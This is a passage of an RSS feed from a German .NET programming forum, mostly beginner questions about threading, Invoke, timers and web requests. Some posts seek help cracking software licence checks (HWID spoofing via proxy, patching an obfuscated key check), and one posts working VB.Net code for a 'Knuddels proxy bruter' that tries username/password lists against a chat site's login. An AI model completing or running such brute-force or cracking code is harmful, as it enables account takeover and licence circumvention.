2. Captcha laden über die Url : <a href="http://www.xsusenet.com/client/assets/securimage/securimage_show.php" target="_blank" rel="nofollow">http://www.xsusenet.com/client/asset...image_show.php</a><br />
<br />
Funktion die ich zum Captchaladen nutze:<br />
<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
Public Function DownloadGraphic(URL As String) As Image<br />
Try<br />
Dim Request As HttpWebRequest = CType(WebRequest.Create(URL), HttpWebRequest)<br />
Request.Method = &quot;GET&quot;<br />
Request.CookieContainer = Containa ' Der globale Cookiecontainer<br />
Dim Response As HttpWebResponse = CType(Request.GetResponse(), HttpWebResponse)<br />
Dim Img As Image = Image.FromStream(Response.GetResponseStream())<br />
Response.Close()<br />
Return Img<br />
Catch ex As Exception<br />
Return Nothing<br />
End Try<br />
End Function
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
-<br />
Leider schlägt das aber fehl. Was mache ich da falsch?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/c-xsusenet-com-registrierung-durchfuehren-29171</guid>
		</item>
		<item>
			<title>C# Proxyserver zum Cracken</title>
			<link>net-94/proxyserver-zum-cracken-29151?goto=newpost</link>
			<pubDate>Wed, 08 Jan 2014 14:46:26 GMT</pubDate>
			<description>Hey, 
 
Ich möchte ein Programm cracken, welches einen Request an die Homepage mit der HWID und einen zufällig generierten String schickt. 
 
Wobei...</description>
			<content:encoded><![CDATA[<div>Hey,<br />
<br />
Ich möchte ein Programm cracken, welches einen Request an die Homepage mit der HWID und einen zufällig generierten String schickt.<br />
<br />
Wobei es auch nicht wirklich cracken ist, ich möchte das Programm einfach auf mehr als einem PC nutzen.<br />
<br />
Als Antwort erhalte ich einen RSA Key welchen der Server mit dem String generiert (denke ich zumindest mal). <br />
<br />
So meine Idee, weil ich nichts am Programm ändern möchte und kann, will ich den Traffic vom Programm auf mein Proxy umleiten, den HWID Key umändern und den zufällig generierten String so lassen um dann den Request weiterzuschicken.<br />
<br />
Möchte keinen fertigen Code sondern einen Ansatz mit welcher Klasse von .NET Framework man dazu nutzen könnte.<br />
<br />
Danke schonmal!</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>rVs14</dc:creator>
			<guid isPermaLink="true">net-94/proxyserver-zum-cracken-29151</guid>
		</item>
		<item>
			<title>.Net Programm cracken?!</title>
			<link>net-94/net-programm-cracken-29008?goto=newpost</link>
			<pubDate>Tue, 31 Dec 2013 11:01:20 GMT</pubDate>
			<description>Guten Morgen, 
 
 
Ich hab mich noch nie mit dem Thema beschäftigt, jedoch hab ich momentan ein in .Net-geschriebenes Programm, welches mich zu dem...</description>
			<content:encoded><![CDATA[<div>Guten Morgen,<br />
<br />
<br />
Ich hab mich noch nie mit dem Thema beschäftigt, jedoch hab ich momentan ein in .Net-geschriebenes Programm, welches mich zu dem Thema animiert:<br />
Ich habe ein Programm, welches mit dotfuscator geschützt wurde, demnach kann ich mit Reflector den Code leider nicht einsehen.<br />
<br />
Dieses Programm baut eine Verbindung zu der Website des Besitzers auf.<br />
Bei richtigen Eingabedaten (Logindaten) steht auf dieser Website eine Zeit, die zeigt, wie lange das Programm noch funktioniert (z.b. 60000 (=60000ms))...<br />
<br />
Nun zu meiner Frage: Wie krig ich es am Besten hin das Tool so zu ändern, dass, egal was für Logindaten ich eingebe immer dieser Wert zurückgegeben wird?<br />
Vermutlich wird das ganze in der Funktion &quot;checkkey&quot; gemacht, jedoch kann ich diese Funktion leider nicht anschauen.<br />
<br />
Hat jemand einen Tipp? ;)<br />
<br />
LG<br />
Baumstumpf</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Baumstumpf</dc:creator>
			<guid isPermaLink="true">net-94/net-programm-cracken-29008</guid>
		</item>
		<item>
			<title>Was ist der Unterschied zwischen String und string?</title>
			<link>net-94/was-ist-der-unterschied-zwischen-string-string-28730?goto=newpost</link>
			<pubDate>Mon, 16 Dec 2013 07:07:13 GMT</pubDate>
			<description><![CDATA[Hey, 
 
hab grade gesehen, dass es einmal String (groß) und 1x string (klein) gibt 
 
 
String S = "Hallo"; 
string s = "Hallo"; 
 
 
Wieso gibt es...]]></description>
			<content:encoded><![CDATA[<div>Hey,<br />
<br />
hab grade gesehen, dass es einmal String (groß) und 1x string (klein) gibt<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
String S = &quot;Hallo&quot;;<br />
string s = &quot;Hallo&quot;;<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Wieso gibt es String 2x? Gibt es einen Unterschied zwischen String und string?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sido</dc:creator>
			<guid isPermaLink="true">net-94/was-ist-der-unterschied-zwischen-string-string-28730</guid>
		</item>
		<item>
			<title>C# Wie GUI aus anderem Thread heraus aktualisieren?</title>
			<link>net-94/wie-gui-aus-anderem-thread-heraus-aktualisieren-28729?goto=newpost</link>
			<pubDate>Mon, 16 Dec 2013 06:49:45 GMT</pubDate>
			<description>Hey, 
 
wie kann ich am einfachsten den Text eines Labels aus einem zweiten Thread aktualisieren? Ich habe einen Thread der HTTP Requests sendet, da...</description>
			<content:encoded><![CDATA[<div>Hey,<br />
<br />
wie kann ich am einfachsten den Text eines Labels aus einem zweiten Thread aktualisieren? Ich habe einen Thread der HTTP Requests sendet, da möchte ich einen Zähler akutalisieren. Bin noch recht neu in C#</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sido</dc:creator>
			<guid isPermaLink="true">net-94/wie-gui-aus-anderem-thread-heraus-aktualisieren-28729</guid>
		</item>
		<item>
			<title>C# Thread Probleme mit Invoken</title>
			<link>net-94/thread-probleme-mit-invoken-28699?goto=newpost</link>
			<pubDate>Sat, 14 Dec 2013 19:30:48 GMT</pubDate>
			<description>Mainwork mw = new Mainwork(this, email, pass, secret); 
 
            playerthread = new Thread(mw.DoMainWork); 
            playerthread.Start(); 
...</description>
			<content:encoded><![CDATA[<div><script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
  Mainwork mw = new Mainwork(this, email, pass, secret);<br />
<br />
            playerthread = new Thread(mw.DoMainWork);<br />
            playerthread.Start();
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Mit dem Code starte ich den Thread. <br />
<br />
Dann bekomme ich folgenden Exception: <br />
<div class="bbcode_container">
	<div class="bbcode_description">Zitat:</div>
	<div class="bbcode_quote printable">
		<hr />
		
			Ungültiger threadübergreifender Vorgang: Der Zugriff auf das Steuerelement listView1 erfolgte von einem anderen Thread als dem Thread, für den es erstellt wurde.
			
		<hr />
	</div>
</div>Dann müsste ich ja den Listview invoken, aber ich hab ja meinen Thread bereits mit meiner Funktion gestartet(mw.DoMainWork).<br />
Ich hoffe mal ihr wisst was  ich meine, danke schonmal!</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>rVs14</dc:creator>
			<guid isPermaLink="true">net-94/thread-probleme-mit-invoken-28699</guid>
		</item>
		<item>
			<title>C# Probleme mit Webrequests und SSL</title>
			<link>net-94/probleme-mit-webrequests-ssl-28545?goto=newpost</link>
			<pubDate>Fri, 06 Dec 2013 10:54:44 GMT</pubDate>
			<description>Hallo, 
 
Ich hab nen kleines Problem mit meinem Webrequest und SSL.  
 
Ich möchte einen HTTPWebrequest mit POSTdata an eine bestimmte URL schicken...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
Ich hab nen kleines Problem mit meinem Webrequest und SSL. <br />
<br />
Ich möchte einen HTTPWebrequest mit POSTdata an eine bestimmte URL schicken und bekomme dabei folgenden Fehler zurück: <br />
<div class="bbcode_container">
	<div class="bbcode_description">Zitat:</div>
	<div class="bbcode_quote printable">
		<hr />
		
			Eine nicht behandelte Ausnahme des Typs &quot;System.Net.WebException&quot; ist in System.dll aufgetreten.<br />
<br />
Zusätzliche Informationen: Die zugrunde liegende Verbindung wurde geschlossen: Für den geschützten SSL/TLS-Kanal konnte keine Vertrauensstellung hergestellt werden..
			
		<hr />
	</div>
</div>Diesen Fehler bekomme ich erst seitdem ich einen Host hinzugefügt habe. <br />
<br />
Wenn ich nun das https aus der URL rausnehme bekomme ich nen Timeout vom Server weil er garnicht mehr auf meinen Request reagiert.<br />
Meine Klasse für den Webrequest: <br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
      public string httpwebrequests(string url, string postdata)<br />
        {<br />
<br />
<br />
            HttpWebRequest myHttpWebRequest = (HttpWebRequest)HttpWebRequest.Create(url);<br />
            myHttpWebRequest.Host = &quot;signin.ea.com&quot;;<br />
            myHttpWebRequest.Method = &quot;POST&quot;;<br />
            myHttpWebRequest.CookieContainer = cc;<br />
          <br />
            myHttpWebRequest.UserAgent = &quot;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0&quot;;<br />
            myHttpWebRequest.Accept = &quot;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&quot;;<br />
            myHttpWebRequest.ContentType = &quot;application/x-www-form-urlencoded&quot;;<br />
<br />
            byte&#91;&#93; data = Encoding.ASCII.GetBytes(postdata);<br />
<br />
<br />
<br />
            myHttpWebRequest.ContentLength = data.Length;<br />
            <br />
            Stream requestStream = myHttpWebRequest.GetRequestStream();<br />
            requestStream.Write(data, 0, data.Length);<br />
            requestStream.Close();<br />
<br />
            HttpWebResponse myHttpWebResponse = (HttpWebResponse)myHttpWebRequest.GetResponse();<br />
<br />
            Stream responseStream = myHttpWebResponse.GetResponseStream();<br />
<br />
            StreamReader myStreamReader = new StreamReader(responseStream, Encoding.Default);<br />
<br />
            string pageContent = myStreamReader.ReadToEnd();<br />
<br />
            myStreamReader.Close();<br />
            responseStream.Close();<br />
<br />
            myHttpWebResponse.Close();<br />
<br />
            return pageContent;<br />
        }<br />
<br />
<br />
    
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>rVs14</dc:creator>
			<guid isPermaLink="true">net-94/probleme-mit-webrequests-ssl-28545</guid>
		</item>
		<item>
			<title>VB.Net NameValueCollection</title>
			<link>net-94/namevaluecollection-28350?goto=newpost</link>
			<pubDate>Wed, 27 Nov 2013 22:39:05 GMT</pubDate>
			<description>Hallo, 
arbeite gerade an einem Knöddels Proxy Bruter und komme gerade nicht weiter. 
 
 
 Public Sub getLogin(ByVal udata As String) 
 
       ...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
arbeite gerade an einem Knöddels Proxy Bruter und komme gerade nicht weiter.<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
 Public Sub getLogin(ByVal udata As String)<br />
<br />
        timeoutT = New Thread(AddressOf Me.timeout)<br />
        timeoutT.Start()<br />
<br />
        username = udata.ToString.Split(&quot;#&quot;)(0)<br />
        password = udata.ToString.Split(&quot;#&quot;)(1)<br />
<br />
        nvc.Clear()<br />
        nvc = New NameValueCollection<br />
        nvc.Add(&quot;domain&quot;, &quot;knuddels.de&quot;)<br />
        nvc.Add(&quot;mode&quot;, &quot;login&quot;)<br />
        nvc.Add(&quot;targetmode&quot;, String.Empty)<br />
        nvc.Add(&quot;targetid&quot;, String.Empty)<br />
        nvc.Add(&quot;name&quot;, username)<br />
        nvc.Add(&quot;pwd&quot;, password)<br />
<br />
        wc = New WebClient<br />
        source = ASCII.GetString(wc.UploadValues(URL, &quot;POST&quot;, nvc))<br />
<br />
        timeoutT.Abort()<br />
<br />
        If source.Contains(&quot;Das eingegebene Passwort ist nicht korrekt.&quot;) Then<br />
            RichTextBox1.AppendText(username &amp; &quot;#&quot; &amp; password &amp; &quot; - FALSCHES PASSWORT&quot; &amp; vbCrLf)<br />
        ElseIf source.Contains(&quot;' existiert nicht.&quot;) Then<br />
            RichTextBox1.AppendText(username &amp; &quot;#&quot; &amp; password &amp; &quot; - NICK EXISTIERT NICHT&quot; &amp; vbCrLf)<br />
        ElseIf source.Contains(&quot;Du hast zu oft dein Passwort falsch eingegeben.&quot;) Then<br />
            RichTextBox1.AppendText(username &amp; &quot;#&quot; &amp; password &amp; &quot; - IP SPERRE&quot; &amp; vbCrLf)<br />
        ElseIf source.Contains(&quot;Du bist eingeloggt als:&quot;) Then<br />
            RichTextBox1.AppendText(username &amp; &quot;#&quot; &amp; password &amp; &quot; - OWNED&quot; &amp; vbCrLf)<br />
        End If<br />
    End Sub<br />
<br />
<br />
<br />
    Public Sub timeout()<br />
        Sleep(timeLimit)<br />
        getLoginT.Abort()<br />
        RichTextBox1.AppendText(&quot;Timeout...&quot;)<br />
    End Sub<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
(Ist jetzt ohne Proxy aber tut meinem Problem nichts zur Sache)<br />
<br />
Das ganze läuft über 2 Threads damit ich den WebClient &quot;abwürgen&quot; falls die Proxy zu langsam ist und das ganze mehr als<br />
1,5 Sekunden dauer(timeLimit). Der ganze Code funktioniert bei einzelnen Aufrufen(auch mehrere hintereinander) eigentlich<br />
wunderbar. Probleme gibts nur wenn ich das ganze mit einer Schleife aufrufe:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
        For Each u In usernameArr<br />
            loginData = New StringBuilder<br />
            loginData.Append(u &amp; &quot;#&quot;)<br />
            For Each p In passwordArr<br />
                loginData.Append(p)<br />
                getLoginT = New Thread(AddressOf Me.getLogin)<br />
                getLoginT.Start(loginData.ToString)<br />
            Next<br />
        Next<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Denn da bekomme ich immer folgende Fehlermeldung:<br />
<i><b>Das Element wurde bereits hinzugefügt. Schlüssel im Wörterbuch: &quot;mode&quot;. Hinzuzufügender Schlüssel: &quot;mode&quot;.</b></i><br />
<br />
Das Element ist aber NICHT IMMER &quot;mode&quot;!<br />
<br />
Die Übergabemethode mit dem StringBuilder ist übringens nur eine von vielen die ich probiert habe.<br />
Das komische aber ist, wenn ich die Threads ohne Schleife aufrufe funktioniert alles wunderbar:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
                getLoginT = New Thread(AddressOf Me.getLogin)<br />
                getLoginT.Start(&quot;username#password&quot;)<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Das hier kann ich in einem Button so oft spammen wie ich will und es funktioniert genau wie ich's mir eigentlich<br />
von der Schleife erwarten würde.(in dem Fall natürlich immer mit den selben Zugangsdaten^^)<br />
<br />
Bin für jede Hilfe dankbar!<br />
<br />
MfG<br />
<br />
//Edit:<br />
Thx für die Antowort! Werd mir dein Snippet morgen (wenn ich nüchtern bin XD) mal genauer anschauen!<br />
<br />
//Edit2:<br />
Schon wieder nicht nüchtern lol e.e xD</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>exception</dc:creator>
			<guid isPermaLink="true">net-94/namevaluecollection-28350</guid>
		</item>
		<item>
			<title>C# Assoziative Arrays in C#?</title>
			<link>net-94/assoziative-arrays-in-c-28301?goto=newpost</link>
			<pubDate>Sun, 24 Nov 2013 14:35:52 GMT</pubDate>
			<description><![CDATA[Hey, 
 
kann man in C# auch wie in PHP Assoziative Arrays benutzen? Ich finde irgendwie nur die normalen :'(]]></description>
			<content:encoded><![CDATA[<div>Hey,<br />
<br />
kann man in C# auch wie in PHP Assoziative Arrays benutzen? Ich finde irgendwie nur die normalen :'(</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Essah</dc:creator>
			<guid isPermaLink="true">net-94/assoziative-arrays-in-c-28301</guid>
		</item>
		<item>
			<title>C# Webbrowser Control eigener Browser</title>
			<link>net-94/webbrowser-control-eigener-browser-28260?goto=newpost</link>
			<pubDate>Fri, 22 Nov 2013 20:58:00 GMT</pubDate>
			<description>Hi, 
 
ich habe angefangen ein bisschen C# zu lernen. Da gibt es ja dieses Webbrowser Control. Wenn ich damit einen Browser programmiere kann man den...</description>
			<content:encoded><![CDATA[<div>Hi,<br />
<br />
ich habe angefangen ein bisschen C# zu lernen. Da gibt es ja dieses Webbrowser Control. Wenn ich damit einen Browser programmiere kann man den dann auch eigenen Browser nennen? Irgendwie erscheint mir das etwas wenig Arbeit für einen ganzen Browser :8</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sido</dc:creator>
			<guid isPermaLink="true">net-94/webbrowser-control-eigener-browser-28260</guid>
		</item>
		<item>
			<title>VB.Net Anzahl geladener Module eines Prozesses auslesen</title>
			<link>net-94/anzahl-geladener-module-eines-prozesses-auslesen-28202?goto=newpost</link>
			<pubDate>Wed, 20 Nov 2013 08:30:12 GMT</pubDate>
			<description>*Hallo Community,* 
mir ist letztens was schönes eingefallen, ich weiß aber noch nicht, ob es überhaupt funktioniert. 
 
*Und zwar:* 
 
Ich habe mir...</description>
			<content:encoded><![CDATA[<div><b>Hallo Community,</b><br />
mir ist letztens was schönes eingefallen, ich weiß aber noch nicht, ob es überhaupt funktioniert.<br />
<br />
<b>Und zwar:</b><br />
<br />
Ich habe mir überlegt, zu einem Programm extern noch einen Prozess laufen zu lassen, der das Haupt-Programm ständig untersucht.<br />
Die Untersuchung soll folgendes bewirken: Es soll die Anzahl geladener Module des Haupt-Programmes auslesen und das Haupt-Programm automatisch schließen, sobald ein Modul zuviel oder ein Modul zuwenig geladen wurde. Ziel ist es den Prozess somit routinemäßig auf nicht erwünschte Dll-Injektionen zu prüfen.<br />
<br />
<b>Wie setzt man sowas am besten um? Brauche 'ne Stütze, danke im Voraus.</b></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Snooki</dc:creator>
			<guid isPermaLink="true">net-94/anzahl-geladener-module-eines-prozesses-auslesen-28202</guid>
		</item>
		<item>
			<title>C# Android-like Musterlogin</title>
			<link>net-94/android-like-musterlogin-28107?goto=newpost</link>
			<pubDate>Fri, 15 Nov 2013 14:23:56 GMT</pubDate>
			<description>Jeder kennen ihm, viele nutzen ihn: den Musterlogin von Android.  
 
Bild: http://u-img.net/img/8593Tz.png  
 
Ich würde jetzt gerne wissen, wie man...</description>
			<content:encoded><![CDATA[<div>Jeder kennen ihm, viele nutzen ihn: den Musterlogin von Android. <br />
<br />
<img src="http://u-img.net/img/8593Tz.png" border="0" alt="" /><br />
<br />
Ich würde jetzt gerne wissen, wie man das Ganze in C#, speziell für eine Windows Phone App. Die Loginmöglichkeit überzeugt mich und würde sie gerne als Verschlüsselunsmethode verwenden.<br />
<br />
Erst will ich also die 9 Punkte zeichnen. Ob ich dafür ein Rectangle benutze oder sonst irgendein Controll lass ich mal offen, weiß ich noch nicht. <br />
Dann will ich auslesen, über welche Punkte der Benutzer in der richtigen Reihenfolge gefahren ist und daraus den Code generieren, der als Passwort gilt. Jeder Punkt wird hier einen Teilstrimg besitzen.<br />
<br />
Leider fehlt mir hier aber komplett der programmiertechnische Ansatz... Kann mir da jemand unter die Arme greifen ?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>xOneDirectionx</dc:creator>
			<guid isPermaLink="true">net-94/android-like-musterlogin-28107</guid>
		</item>
		<item>
			<title>VB.Net Control aus Thread hinzuüfen(Invoke)</title>
			<link>net-94/control-aus-thread-hinzuuefen-invoke-27972?goto=newpost</link>
			<pubDate>Sat, 09 Nov 2013 14:39:40 GMT</pubDate>
			<description>Hallo! 
Ich will ein PictureBox von einem Thread aus auf ein Panel hinzufügen: 
 
 
Code: 
--------- 
Public Sub Thread() 
            item = New...</description>
			<content:encoded><![CDATA[<div>Hallo!<br />
Ich will ein PictureBox von einem Thread aus auf ein Panel hinzufügen:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Public Sub Thread()<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; item = New PictureBox<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; With item<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; .Width = 30<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; .Height = 30<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; .Location = New Point(rnd.Next(0, Panel1.Width.ToString), rnd.Next(0, Panel1.Width.ToString))<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; .BackColor = Color.Red<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; End With<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Panel1.Controls.Add(item)<br />
End Sub</code><hr />
</div>Problem ist das ich folgende Fehlermeldung bekomme:<br />
<i>Steuerelemente, die für einen Thread erstellt wurden, können nicht einem Steuerelement in einem anderen Thread übergeordnet werden.</i><br />
<br />
Hab ein bisschen gegoogelt und herausgefunden das ich die PictureBox mittels der Invoke-Methode hinzufügen muss.<br />
Gibt zwar viele Beispiel-Codes aber ich trotzdem bin ich schon seit einer Stunde am herumprobieren und kriegs nicht hin -.-<br />
<br />
Wäre nett wenn mir wer helfen kann!<br />
<br />
Edit:<br />
Doch noch hinbekommen!<br />
<br />
Panel1.Invoke(Sub() Panel1.Controls.Add(PicturBox))</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>exception</dc:creator>
			<guid isPermaLink="true">net-94/control-aus-thread-hinzuuefen-invoke-27972</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net TabControl Webrowser[Sample]]]></title>
			<link>net-94/tabcontrol-webrowser-sample-27828?goto=newpost</link>
			<pubDate>Sat, 02 Nov 2013 13:06:03 GMT</pubDate>
			<description><![CDATA[Hi! 
Wollte eigentlich nur kurz etwas ausprobieren aber bin dann irgendwie auf diese "TabControl-WebBrower"-Idee gekommen xD 
Hab mir jedenfalls...]]></description>
			<content:encoded><![CDATA[<div>Hi!<br />
Wollte eigentlich nur kurz etwas ausprobieren aber bin dann irgendwie auf diese &quot;TabControl-WebBrower&quot;-Idee gekommen xD<br />
Hab mir jedenfalls gedacht, das ich die Projektmappe einfach mal hochlade :D<br />
<br />
Hier noch ein Screen:<br />
<a href="http://www.u-img.net/view/8410Uc.png" target="_blank"><img src="http://u-img.net/img/8410Uc_thumb.png" border="0" alt="" /></a><br />
<br />
DL: <a href="https://u-labs.de/forum/attachment.php?attachmentid=5575&amp;d=1383397517"  title="Name:  tabBrowser1.rar
Hits: 154
Größe:  86,3 KB">tabBrowser1.rar</a><br />
<br />
MfG</div>


	<div style="padding:10px">

	

	

	

	
		<fieldset class="fieldset">
			<legend>Angehängte Dateien</legend>
			<ul>
			<li>
	<img class="inlineimg" src="https://u-labs.de/forum/images/attach/rar.gif" alt="Dateityp: rar" />
	<a href="https://u-labs.de/forum/attachment.php?attachmentid=5575&amp;d=1383397517">tabBrowser1.rar</a> 
(86,3 KB)
</li>
			</ul>
		</fieldset>
	

	</div>
]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>exception</dc:creator>
			<guid isPermaLink="true">net-94/tabcontrol-webrowser-sample-27828</guid>
		</item>
		<item>
			<title><![CDATA[C# [Windows Phone 8] Zwischenablage in Hintergrund leeren]]></title>
			<link>net-94/windows-phone-8-zwischenablage-in-hintergrund-leeren-27737?goto=newpost</link>
			<pubDate>Tue, 29 Oct 2013 23:44:27 GMT</pubDate>
			<description>Huhu 
 
ich habe mich an die Entwicklung einer Windows Phone App gesetzt. Ein Feature dieser soll sein, dass sich die Zwischenablage alle X Sekunden...</description>
			<content:encoded><![CDATA[<div>Huhu<br />
<br />
ich habe mich an die Entwicklung einer Windows Phone App gesetzt. Ein Feature dieser soll sein, dass sich die Zwischenablage alle X Sekunden selbst leert. Im Grunde kein Problem. Ich definiere in der Apple.xaml.cs beim Starten einen neuen Thread, der schön invoked die ZA leert.<br />
Jetzt möchte ich aber noch, dass nach dem Minimieren der App (= Klick auf Homebutton) nach Ablauf der Zeit die ZA noch einmal geleert wird. Mein Thread macht das bei einer hoch eingestellten Zeit nicht, da die Aktionen in der App nur für etwa 10 Sekunden nach dem minimieren noch ausgeführt werden.<br />
<br />
Über die Background Alerts ist dies auch nicht möglich, da dort ein Zugriff auf die System.Clipboard-Funktionen nicht gegeben ist.<br />
<br />
Hat jemand einen Tipp für mich, wie ich das Ganze lösen kann? Bin froh über jede sinnvolle Antwort. Fragen wie &quot;Für was brauchst du das&quot; etc. werden reportet.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>xOneDirectionx</dc:creator>
			<guid isPermaLink="true">net-94/windows-phone-8-zwischenablage-in-hintergrund-leeren-27737</guid>
		</item>
		<item>
			<title>C# Timer und Prozess killen - Frage</title>
			<link>net-94/timer-prozess-killen-frage-27546?goto=newpost</link>
			<pubDate>Wed, 23 Oct 2013 16:33:20 GMT</pubDate>
			<description>Joo ! Habe da mal eine Frage bezüglich Timer und Prozesse im Taskmanager killen ! :-) 
 
Also ich möchte halt, dass nach einer bestimmten Zeit eine...</description>
			<content:encoded><![CDATA[<div>Joo ! Habe da mal eine Frage bezüglich Timer und Prozesse im Taskmanager killen ! :-)<br />
<br />
Also ich möchte halt, dass nach einer bestimmten Zeit eine Methode aufgerufen wird .. realisiert habe ich das Ganze so, nur bei mir wird eben die Methode nicht aufgerufen !<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
private void t1_Tick(object sender, EventArgs e)<br />
{<br />
    showVerlauf(String.Format(&quot;blaa blaa&quot;));<br />
}
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Und folgendes rufe ich in einer anderen Methode auf:<br />
 <br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
t1.Interval = 2000;<br />
t1.Tick += new EventHandler(t1_Tick); <br />
t1.Start(); <br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
<br />
Und jetzt zu den Prozessen !<br />
Habe versucht den Prozess, nachdem die Form geclosed wird, so zu beenden:<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
private void Form1_FormClosing(object sender, FormClosingEventArgs e)<br />
        {<br />
            Process&#91;&#93; pp = Process.GetProcessesByName(&quot;NAME&quot;);<br />
            foreach (Process p in pp)<br />
            {<br />
                p.Kill(); <br />
            }<br />
            Environment.Exit(0);<br />
        }
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script><br />
WIe muss jetzt der Name bei GetProcessByName sein? 1:1 wie es im Taskmanager steht? Weil komischerweise beendet er den Prozess nicht.<br />
<br />
Lg, Saad.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Saad</dc:creator>
			<guid isPermaLink="true">net-94/timer-prozess-killen-frage-27546</guid>
		</item>
		<item>
